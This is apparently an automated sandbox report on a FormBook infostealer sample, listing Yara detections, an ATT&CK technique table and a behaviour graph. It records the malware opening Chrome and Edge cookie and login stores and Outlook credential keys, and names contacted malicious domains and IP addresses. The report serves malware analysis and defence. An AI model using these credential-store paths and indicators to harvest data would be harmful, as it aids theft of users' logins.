                Source: Yara matchFile source: 0000000B.00000002.4645931849.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.4643912101.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\net.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.Gd3lOevK672JYIK.zip.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Gd3lOevK672JYIK.zip.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2639564643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2697225116.0000000005DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.4655930930.0000000004B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.4647930046.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4653755949.0000000004880000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2641308327.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.4645931849.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.4643912101.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		11
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items14
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1608114 Sample: Gd3lOevK672JYIK.zip.exe Startdate: 06/02/2025 Architecture: WINDOWS Score: 100 33 www.superhoroz.xyz 2->33 35 www.physicsbrain.xyz 2->35 37 14 other IPs or domains 2->37 45 Suricata IDS alerts for network traffic 2->45 47 Antivirus detection for URL or domain 2->47 49 Multi AV Scanner detection for submitted file 2->49 53 6 other signatures 2->53 10 Gd3lOevK672JYIK.zip.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 35->51 process4 file5 31 C:\Users\user\...behaviorgraphd3lOevK672JYIK.zip.exe.log, ASCII 10->31 dropped 67 Injects a PE file into a foreign processes 10->67 14 Gd3lOevK672JYIK.zip.exe 10->14         started        17 Gd3lOevK672JYIK.zip.exe 10->17         started        signatures6 process7 signatures8 69 Maps a DLL or memory area into another process 14->69 19 TjdgrMPwNLGImh.exe 14->19 injected process9 signatures10 55 Found direct / indirect Syscall (likely to bypass EDR) 19->55 22 net.exe 13 19->22         started        process11 signatures12 57 Tries to steal Mail credentials (via file / registry access) 22->57 59 Tries to harvest and steal browser information (history, passwords, etc) 22->59 61 Modifies the context of a thread in another process (thread injection) 22->61 63 3 other signatures 22->63 25 TjdgrMPwNLGImh.exe 22->25 injected 29 firefox.exe 22->29         started        process13 dnsIp14 39 www.adjokctp.icu 172.67.179.147, 57312, 57313, 57314 CLOUDFLARENETUS United States 25->39 41 www.physicsbrain.xyz 13.248.169.48, 57302, 57303, 57305 AMAZON-02US United States 25->41 43 7 other IPs or domains 25->43 65 Found direct / indirect Syscall (likely to bypass EDR) 25->65 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.